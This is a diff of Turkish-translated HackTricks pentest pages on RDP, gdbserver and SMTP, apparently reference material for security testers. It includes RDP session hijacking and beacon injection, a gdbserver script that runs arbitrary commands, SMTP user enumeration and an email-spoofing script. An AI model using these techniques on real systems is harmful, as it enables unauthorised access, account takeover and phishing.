<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; keşiften raporlamaya kadar. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

View file

@ -15,15 +15,15 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
## Temel Bilgiler
Microsoft tarafından geliştirilen **Uzak Masaüstü Protokolü** (**RDP**), bilgisayarlar arasında bir ağ üzerinden grafiksel bir arayüz bağlantısı sağlamayı amaçlamaktadır. Böyle bir bağlantıyı kurmak için, kullanıcı tarafından **RDP** istemci yazılımı kullanılır ve aynı anda, uzak bilgisayarın **RDP** sunucu yazılımını çalıştırması gerekmektedir. Bu kurulum, uzak bir bilgisayarın masaüstü ortamının sorunsuz bir şekilde kontrol edilmesini ve erişilmesini sağlar; temelde arayüzünü kullanıcının yerel cihazına getirir.
Microsoft tarafından geliştirilen **Uzak Masaüstü Protokolü** (**RDP**), bilgisayarlar arasında bir ağ üzerinden grafiksel bir arayüz bağlantısı sağlamayı amaçlamaktadır. Böyle bir bağlantı kurmak için, kullanıcı tarafından **RDP** istemci yazılımı kullanılır ve aynı anda, uzak bilgisayarın **RDP** sunucu yazılımını çalıştırması gerekmektedir. Bu kurulum, uzak bir bilgisayarın masaüstü ortamının kesintisiz kontrolünü ve erişimini sağlar; temelde arayüzünü kullanıcının yerel cihazına getirir.
**Varsayılan port:** 3389
```
@ -68,9 +68,9 @@ impacket'ten rdp\_check.py, bazı kimlik bilgilerinin bir RDP hizmeti için geç
```bash
rdp_check <domain>/<name>:<password>@<IP>
```
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine inceleme, shell açma ve eğlenme fırsatı vermek için özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -78,7 +78,7 @@ rdp_check <domain>/<name>:<password>@<IP>
### Oturum çalma
**SYSTEM izinleriyle** herhangi bir **kullanıcı tarafından açılmış RDP oturumuna** erişebilirsiniz, sahibinin şifresini bilmenize gerek yoktur.
**SYSTEM izinleriyle** herhangi bir **kullanıcı tarafından açılmış RDP oturumuna** erişebilirsiniz; sahibinin şifresini bilmenize gerek yoktur.
**Açık oturumları alın:**
```
@ -92,7 +92,7 @@ Artık seçilen RDP oturumunun içinde olacaksınız ve yalnızca Windows araçl
**Önemli**: Aktif RDP oturumuna eriştiğinizde, onu kullanan kullanıcıyı çıkartacaksınız.
Şifreleri süreçten dökerek alabilirsiniz, ancak bu yöntem çok daha hızlıdır ve kullanıcıların sanal masaüstleriyle etkileşimde bulunmanızı sağlar (şifreler not defterinde, diske kaydedilmeden, diğer makinelerde açık olan diğer RDP oturumları...)
Şifreleri işlemi dökerek alabilirsiniz, ancak bu yöntem çok daha hızlıdır ve kullanıcıların sanal masaüstleriyle etkileşimde bulunmanıza olanak tanır (şifreler not defterinde, diske kaydedilmeden, diğer makinelerde açık olan diğer RDP oturumları...)
#### **Mimikatz**
@ -109,7 +109,7 @@ Bu tekniklerden biriyle arka kapı bırakılmış RDP'leri şu linkle arayabilir
### RDP Süreç Enjeksiyonu
Farklı bir alan adından veya **daha iyi yetkilere sahip biri RDP ile** **senin Admin** olduğun PC'ye giriş yaparsa, onun **RDP oturum süreci** içine beacon'ını **enjekte** edebilir ve onun gibi hareket edebilirsin:
Farklı bir alan adından veya **daha iyi yetkilere sahip biri RDP ile** **senin Admin** olduğun PC'ye giriş yaparsa, onun **RDP oturum süreci** içine beacon'ını **enjekte** edebilir ve onun gibi davranabilirsin:
{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %}
[rdp-sessions-abuse.md](../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
@ -123,13 +123,13 @@ net localgroup "Remote Desktop Users" UserLoginName /add
* [**AutoRDPwn**](https://github.com/JoelGMSec/AutoRDPwn)
**AutoRDPwn**, Microsoft Windows bilgisayarlarında **Shadow** saldırısını otomatikleştirmek için tasarlanmış, Powershell'de oluşturulmuş bir post-exploitation framework'tür. Bu zafiyet (Microsoft tarafından bir özellik olarak listelenmiştir), uzaktan bir saldırganın **kurbanının masaüstünü izinsiz olarak görüntülemesine** ve hatta talep üzerine kontrol etmesine olanak tanır; bu, işletim sisteminin kendisine ait araçlar kullanılarak yapılır.
**AutoRDPwn**, esas olarak Microsoft Windows bilgisayarlarında **Shadow** saldırısını otomatikleştirmek için tasarlanmış, Powershell'de oluşturulmuş bir post-exploitation framework'tür. Bu zafiyet (Microsoft tarafından bir özellik olarak listelenmiştir), uzaktan bir saldırganın **kurbanının masaüstünü izinsiz olarak görüntülemesine** ve hatta talep üzerine kontrol etmesine olanak tanır; bu, işletim sisteminin kendisine ait araçlar kullanılarak yapılır.
* [**EvilRDP**](https://github.com/skelsec/evilrdp)
* Komut satırından otomatik bir şekilde fare ve klavye kontrolü
* Komut satırından otomatik bir şekilde panoya kontrol
* Hedefe RDP üzerinden ağ iletişimini yönlendiren bir SOCKS proxy'si oluşturma
* Hedefte dosya yüklemeden rastgele SHELL ve PowerShell komutları yürütme
* RDP üzerinden hedefe ağ iletişimini yönlendiren bir SOCKS proxy'si oluşturma
* Hedefte dosya yüklemeden rastgele SHELL ve PowerShell komutları çalıştırma
* Hedefte dosya transferleri devre dışı olsa bile hedefe dosya yükleme ve indirme
## HackTricks Automatic Commands
@ -151,7 +151,7 @@ Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
```
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; keşiften raporlamaya kadar. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.

View file

@ -9,13 +9,13 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
<summary>HackTricks'i Destekleyin</summary>
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'i takip edin.**
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** bizi takip edin.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
@ -23,9 +23,9 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
## **Temel Bilgiler**
**gdbserver**, programların uzaktan hata ayıklanmasını sağlayan bir araçtır. Hata ayıklanması gereken programla aynı sistemde, "hedef" olarak bilinen sistemde çalışır. Bu kurulum, **GNU Debugger**'ın kaynak kodunun ve hata ayıklanan programın ikili kopyasının saklandığı farklı bir makineden, "host"tan bağlanmasına olanak tanır. **gdbserver** ile hata ayıklayıcı arasındaki bağlantı TCP veya seri hat üzerinden yapılabilir, bu da çok yönlü hata ayıklama kurulumlarına olanak tanır.
**gdbserver**, programların uzaktan hata ayıklanmasını sağlayan bir araçtır. Hata ayıklanması gereken programla aynı sistemde, "hedef" olarak bilinen programın yanında çalışır. Bu kurulum, **GNU Debugger**'ın kaynak kodunun ve hata ayıklanan programın ikili kopyasının saklandığı farklı bir makineden, "host"tan bağlanmasına olanak tanır. **gdbserver** ile hata ayıklayıcı arasındaki bağlantı TCP veya seri hat üzerinden yapılabilir, bu da çok yönlü hata ayıklama kurulumlarına olanak tanır.
**gdbserver'ı herhangi bir portta dinlemeye alabilirsiniz** ve şu anda **nmap hizmeti tanımakta yetersizdir**.
**gdbserver'ı herhangi bir portta dinlemeye** ayarlayabilirsiniz ve şu anda **nmap hizmeti tanıyamıyor**.
## İstismar
@ -56,7 +56,7 @@ run
```
### Rastgele komutlar çalıştırma
**Hata ayıklayıcının rastgele komutlar çalıştırmasını sağlamak için başka bir yol** [**buradan alınan python özel betiği**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target) vardır.
**Hata ayıklayıcının rastgele komutlar çalıştırmasını sağlamak için başka bir yol vardır** [**buradan alınan python özel betiği**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target).
```bash
# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
target extended-remote 192.168.1.4:2345
@ -196,15 +196,15 @@ RemoteCmd()
```
{% endcode %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; keşiften raporlamaya kadar. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
AWS Hacking'i öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>

View file

@ -1,4 +1,4 @@
# 25,465,587 - SMTP/s Pentesting
# 25,465,587 - Pentesting SMTP/s
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
@ -9,15 +9,15 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
<summary>HackTricks'i Destekleyin</summary>
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** bizi takip edin.**
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'i takip edin.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Güvenlik açığı değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -64,9 +64,9 @@ dig +short mx google.com
nmap -p25 --script smtp-commands 10.10.10.10
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
```
### NTLM Auth - Bilgi ifşası
### NTLM Auth - Bilgi sızıntısı
Eğer sunucu NTLM auth (Windows) destekliyorsa, hassas bilgilere (sürümler) ulaşabilirsiniz. Daha fazla bilgi [**burada**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666).
Eğer sunucu NTLM kimlik doğrulamayı (Windows) destekliyorsa, hassas bilgilere (sürümler) ulaşabilirsiniz. Daha fazla bilgi [**burada**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666).
```bash
root@kali: telnet example.com 587
220 example.com SMTP Server Banner
@ -102,7 +102,7 @@ MAIL FROM: me
```
### Sniffing
Port 25'e giden paketlerden bazı şifreleri koklayıp koklayamadığınızı kontrol edin.
Port 25'ten paketlerden bazı şifreleri koklayıp koklayamayacağını kontrol et
### [Auth bruteforce](../../generic-methodologies-and-resources/brute-force.md#smtp)
@ -129,6 +129,10 @@ RCPT TO:ed
250 2.1.5 ed... Recipient ok
```
### VRFY
The VRFY command is used to verify if a specific email address exists on the mail server.
VRFY komutu, belirli bir e-posta adresinin posta sunucusunda mevcut olup olmadığını doğrulamak için kullanılır.
```bash
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
@ -167,7 +171,7 @@ Metasploit: auxiliary/scanner/smtp/smtp_enum
smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
Nmap: nmap --script smtp-enum-users <IP>
```
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
@ -244,7 +248,7 @@ print("[***]successfully sent email to %s:" % (msg['To']))
## SMTP Smuggling
SMTP Smuggling açığı, tüm SMTP korumalarını atlamaya izin verdi (korumalar hakkında daha fazla bilgi için bir sonraki bölüme bakın). SMTP Smuggling hakkında daha fazla bilgi için kontrol edin:
SMTP Smuggling açığı, tüm SMTP korumalarını atlamaya izin veriyordu (korumalar hakkında daha fazla bilgi için bir sonraki bölüme bakın). SMTP Smuggling hakkında daha fazla bilgi için:
{% content-ref url="smtp-smuggling.md" %}
[smtp-smuggling.md](smtp-smuggling.md)
@ -252,7 +256,7 @@ SMTP Smuggling açığı, tüm SMTP korumalarını atlamaya izin verdi (korumala
## Mail Spoofing Karşı Önlemleri
Kuruluşlar, SMTP mesajlarının sahtecilik yapma kolaylığı nedeniyle, **SPF**, **DKIM** ve **DMARC** kullanarak kendi adlarına yetkisiz e-posta gönderilmesini engeller.
Kuruluşlar, SMTP mesajlarının kolayca sahte oluşturulması nedeniyle, **SPF**, **DKIM** ve **DMARC** kullanarak kendi adlarına yetkisiz e-posta gönderilmesini engeller.
**Bu karşı önlemler için tam bir rehber** [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/) adresinde mevcuttur.
@ -267,30 +271,30 @@ Ayrıca, önceki spf kayıtlarını yeniden kullanmak için genellikle `"v=spf1
#### Mekanizmalar
[Wikipedia'dan](https://en.wikipedia.org/wiki/Sender\_Policy\_Framework):
[Wikipedia](https://en.wikipedia.org/wiki/Sender\_Policy\_Framework) adresinden:
| Mekanizma | Açıklama |
| --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ALL | Her zaman eşleşir; önceki mekanizmalarla eşleşmeyen tüm IP'ler için `-all` gibi bir varsayılan sonuç için kullanılır. |
| ALL | Her zaman eşleşir; önceki mekanizmalarla eşleşmeyen tüm IP'ler için `-all` gibi varsayılan bir sonuç için kullanılır. |
| A | Alan adı, gönderenin adresine çözülebilen bir adres kaydına (A veya AAAA) sahipse, eşleşir. |
| IP4 | Gönderen belirli bir IPv4 adres aralığındaysa, eşleşir. |
| IP6 | Gönderen belirli bir IPv6 adres aralığındaysa, eşleşir. |
| MX | Alan adı, gönderenin adresine çözülen bir MX kaydına sahipse, eşleşir (yani, e-posta alanın gelen e-posta sunucularından birinden gelir). |
| IP4 | Gönderen, belirli bir IPv4 adres aralığındaysa, eşleşir. |
| IP6 | Gönderen, belirli bir IPv6 adres aralığındaysa, eşleşir. |
| MX | Alan adı, gönderenin adresine çözülen bir MX kaydına sahipse, eşleşir (yani, e-posta alan adının gelen e-posta sunucularından birinden gelir). |
| PTR | Müşterinin adresi için alan adı (PTR kaydı) belirtilen alanda ise ve bu alan adı müşterinin adresine çözülüyorsa (ileri onaylı ters DNS), eşleşir. Bu mekanizma önerilmez ve mümkünse kaçınılmalıdır. |
| EXISTS | Belirtilen alan adı herhangi bir adrese çözülüyorsa, eşleşir (çözülen adres ne olursa olsun). Bu nadiren kullanılır. SPF makro dili ile birlikte, DNSBL sorguları gibi daha karmaşık eşleşmeler sunar. |
| INCLUDE | Başka bir alanın politikasını referans alır. O alanın politikası geçerse, bu mekanizma geçer. Ancak, dahil edilen politika başarısız olursa, işleme devam edilir. Başka bir alanın politikasına tamamen devretmek için yönlendirme uzantısı kullanılmalıdır. |
| REDIRECT | <p>Bir yönlendirme, bir SPF politikasını barındıran başka bir alan adına işaret eder, aynı SPF politikasını paylaşan birden fazla alanın olmasına izin verir. Bu, aynı e-posta altyapısını paylaşan çok sayıda alanla çalışırken faydalıdır.</p><p>Yönlendirme Mekanizmasında belirtilen alanın SPF politikası kullanılacaktır.</p> |
| INCLUDE | Başka bir alanın politikasını referans alır. O alanın politikası geçerse, bu mekanizma geçer. Ancak, dahil edilen politika başarısız olursa, işleme devam eder. Başka bir alanın politikasına tamamen devretmek için, yönlendirme uzantısı kullanılmalıdır. |
| REDIRECT | <p>Yönlendirme, bir SPF politikasını barındıran başka bir alan adına işaret eden bir işarettir, bu da birden fazla alanın aynı SPF politikasını paylaşmasına olanak tanır. Aynı e-posta altyapısını paylaşan çok sayıda alanla çalışırken faydalıdır.</p><p>Yönlendirme Mekanizmasında belirtilen alanın SPF politikası kullanılacaktır.</p> |
Ayrıca, **bir mekanizma eşleşirse ne yapılması gerektiğini** belirten **Nitelikler** tanımlamak da mümkündür. Varsayılan olarak, **nitelik "+"** kullanılır (yani, herhangi bir mekanizma eşleşirse, bu izin verildiği anlamına gelir).\
Genellikle, **her SPF politikasının sonunda** **\~all** veya **-all** gibi bir şey not edersiniz. Bu, **eğer gönderen herhangi bir SPF politikasına uymuyorsa, e-postayı güvensiz olarak işaretlemeniz (\~) veya e-postayı reddetmeniz (-) gerektiğini** belirtmek için kullanılır.
Genellikle, **her SPF politikasının sonunda** **\~all** veya **-all** gibi bir şey göreceksiniz. Bu, **eğer gönderen herhangi bir SPF politikasına uymuyorsa, e-postayı güvensiz olarak işaretlemeniz (\~) veya e-postayı reddetmeniz (-) gerektiğini** belirtmek için kullanılır.
#### Nitelikler
Politikadaki her mekanizma, istenen sonucu tanımlamak için dört nitelikten biri ile ön eklenebilir:
* **`+`**: PASS sonucuna karşılık gelir. Varsayılan olarak, mekanizmalar bu nitelik varsayımını yapar, bu da `+mx`'in `mx` ile eşdeğer olduğu anlamına gelir.
* **`+`**: PASS sonucuna karşılık gelir. Varsayılan olarak, mekanizmalar bu niteliği varsayar, bu da `+mx`'in `mx` ile eşdeğer olduğu anlamına gelir.
* **`?`**: NEUTRAL sonucunu temsil eder, NONE (belirli bir politika yok) ile benzer şekilde işlenir.
* **`~`**: SOFTFAIL'i belirtir, NEUTRAL ile FAIL arasında bir orta zemin olarak hizmet eder. Bu sonucu karşılayan e-postalar genellikle kabul edilir ancak uygun şekilde işaretlenir.
* **`~`**: SOFTFAIL'i belirtir, NEUTRAL ile FAIL arasında bir orta zemin işlevi görür. Bu sonucu karşılayan e-postalar genellikle kabul edilir ancak uygun şekilde işaretlenir.
* **`-`**: FAIL'i belirtir, e-postanın tamamen reddedilmesi gerektiğini önerir.
Gelecek örnekte, **google.com'un SPF politikası** gösterilmektedir. İlk SPF politikasında farklı alanlardan SPF politikalarının dahil edilmesine dikkat edin:
@ -312,15 +316,15 @@ _netblocks2.google.com. 1908 IN TXT "v=spf1 ip6:2001:4860:4000::/36
dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903 IN TXT "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"
```
Geleneksel olarak, doğru/hiçbir SPF kaydı olmayan herhangi bir alan adını taklit etmek mümkündü. **Günümüzde**, eğer **email** geçerli bir **SPF kaydı olmayan bir alandan** geliyorsa, muhtemelen **otomatik olarak reddedilecek/ güvensiz olarak işaretlenecektir**.
Geleneksel olarak, doğru/hiçbir SPF kaydı olmayan herhangi bir alan adını taklit etmek mümkündü. **Günümüzde**, eğer **email** geçerli bir **SPF kaydı olmayan bir alan adından** geliyorsa, muhtemelen **otomatik olarak reddedilecek/ güvensiz olarak işaretlenecektir**.
Bir alan adının SPF'sini kontrol etmek için şu çevrimiçi araçları kullanabilirsiniz: [https://www.kitterman.com/spf/validate.html](https://www.kitterman.com/spf/validate.html)
Bir alan adının SPF'sini kontrol etmek için çevrimiçi araçlar kullanabilirsiniz: [https://www.kitterman.com/spf/validate.html](https://www.kitterman.com/spf/validate.html)
### DKIM (DomainKeys Identified Mail)
DKIM, dışa giden e-postaları imzalamak için kullanılır ve bunların, alan adının DNS'inden alınan genel anahtar aracılığıyla dış Mail Transfer Agent'ları (MTA'lar) tarafından doğrulanmasına olanak tanır. Bu genel anahtar, bir alan adının TXT kaydında bulunur. Bu anahtara erişmek için hem seçici hem de alan adı bilinmelidir.
Örneğin, anahtarı talep etmek için alan adı ve seçici gereklidir. Bunlar, mail başlığında `DKIM-Signature` içinde bulunabilir, örneğin, `d=gmail.com;s=20120113`.
Örneğin, anahtarı talep etmek için alan adı ve seçici gereklidir. Bunlar, mail başlığında `DKIM-Signature` içinde bulunabilir, örneğin `d=gmail.com;s=20120113`.
Bu bilgiyi almak için bir komut şöyle görünebilir:
```bash
@ -330,9 +334,9 @@ dig 20120113._domainkey.gmail.com TXT | grep p=
```
### DMARC (Domain-based Message Authentication, Reporting & Conformance)
DMARC, SPF ve DKIM protokollerinin üzerine inşa edilerek e-posta güvenliğini artırır. Belirli bir alan adından gelen e-postaların işlenmesiyle ilgili olarak, kimlik doğrulama hatalarıyla nasıl başa çıkılacağı ve e-posta işleme eylemleri hakkında raporların nereye gönderileceği gibi politikaları belirler.
DMARC, SPF ve DKIM protokollerinin üzerine inşa edilerek e-posta güvenliğini artırır. Belirli bir alan adından gelen e-postaların işlenmesinde, kimlik doğrulama hatalarıyla nasıl başa çıkılacağı ve e-posta işleme eylemleri hakkında raporların nereye gönderileceği gibi politikaları belirler.
**DMARC kaydını almak için, \_dmarc alt alan adını sorgulamanız gerekir**
**DMARC kaydını almak için \_dmarc alt alan adını sorgulamanız gerekir**
```bash
# Reject
dig _dmarc.facebook.com txt | grep DMARC
@ -352,22 +356,22 @@ _dmarc.bing.com. 3600 IN TXT "v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMA
| ---------- | -------------------------------------------- | ------------------------------- |
| v | Protokol versiyonu | v=DMARC1 |
| pct | Filtrelemeye tabi tutulan mesajların yüzdesi| pct=20 |
| ruf | Adli raporlar için raporlama URI'si | ruf=mailto:authfail@example.com |
| rua | Toplu raporlar için raporlama URI'si | rua=mailto:aggrep@example.com |
| p | Kurumsal alan için politika | p=quarantine |
| sp | OD'nin alt alanları için politika | sp=reject |
| adkim | DKIM için hizalama modu | adkim=s |
| aspf | SPF için hizalama modu | aspf=r |
| ruf | Adli raporlar için raporlama URI'si | ruf=mailto:authfail@example.com |
| rua | Toplu raporlar için raporlama URI'si | rua=mailto:aggrep@example.com |
| p | Kurumsal alan için politika | p=quarantine |
| sp | OD'nin alt alanları için politika | sp=reject |
